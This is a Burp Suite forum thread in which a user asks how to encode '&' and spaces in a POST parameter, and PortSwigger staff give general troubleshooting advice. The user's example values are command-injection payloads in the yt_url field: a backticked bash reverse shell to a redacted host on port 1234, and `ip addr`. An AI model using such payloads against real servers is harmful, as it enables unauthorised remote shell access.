Burp Suite User Forum

Login to post

Allowing the symbol "&" to be part of a string, instead of being something else

Mike | Last updated: Jan 14, 2021 03:19AM UTC

Hello, I've been trying to add the symbol "&" as part of a string in my POST request yet, I can't find out how. I tried backslash, "`", etc. I would truly appreciate it if you could help me out as soon as possible. Thank you.

Mike | Last updated: Jan 14, 2021 03:27AM UTC

yt_url=`bash`\\`-i`\\`>&`\\`/dev/tcp/[REDACTED]/1234`\\`0>&1` This is how my POST request is like at the moment, all I need is the "&" to be part of the string.

Mike | Last updated: Jan 14, 2021 03:40AM UTC

Also, how would I add spaces to be part of the string as well. Example: `ip addr`.

Mike | Last updated: Jan 14, 2021 03:41AM UTC

Last reply, encoding "spaces" and "&" doesn't work either.

Mike | Last updated: Jan 14, 2021 03:44AM UTC

Okay, actual last reply. Since I want to make sure I don't leave any information out, the error I get if I encode "spaces" or "&" is "Syntax error: EOF in backquote substitution\n".

Mike | Last updated: Jan 14, 2021 02:10PM UTC

Any agents that can assist?

Hannah, PortSwigger Agent | Last updated: Jan 14, 2021 02:40PM UTC

Hi Could you provide some more context in what you're trying to encode and where? When you're talking about encoding, would you be referring to URL-encoding your characters?

Mike | Last updated: Jan 14, 2021 03:47PM UTC

To further explain, I'm trying to add spaces and the symbol "&" as part of a string in a POST request via Burpsuite repeater, yet I can't find the way. The symbol "&" keeps breaking the string even when it's encoded. With spaces though, even encoded, I receive the error, "{"status":2,"errors":"sh: 1: Syntax error: EOF in backquote substitution\" POST / HTTP/1.1 Host: [redacted] Content-Length: 12 Accept: */* X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: [redacted] Referer: [redacted] Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close yt_url=`ip addr`

Mike | Last updated: Jan 14, 2021 03:47PM UTC

yt_url=`ip addr`, is the post request string aka post data

Mike | Last updated: Jan 14, 2021 03:56PM UTC

Even doing yt_url=`ip%20addr` causes the same error.

Michelle, PortSwigger Agent | Last updated: Jan 15, 2021 04:46PM UTC

The error you're getting looks to be coming from the server itself and could relate to the backticks/how details are quoted, it's the kind of error that could be generated even if you weren't using Burp and some details were passed to a script in a way that was not accepted (e.g. where backticks are used, how variables are quoted). It might be worth trying to break this down into smaller steps, for example, if the information in yt_url is passed to a script on the server, then does the syntax work on the server itself, without Burp in the loop or can you find out how much of the string you tried to pass was seen by the script?

You need to Log in to post a reply. Or register here, for free.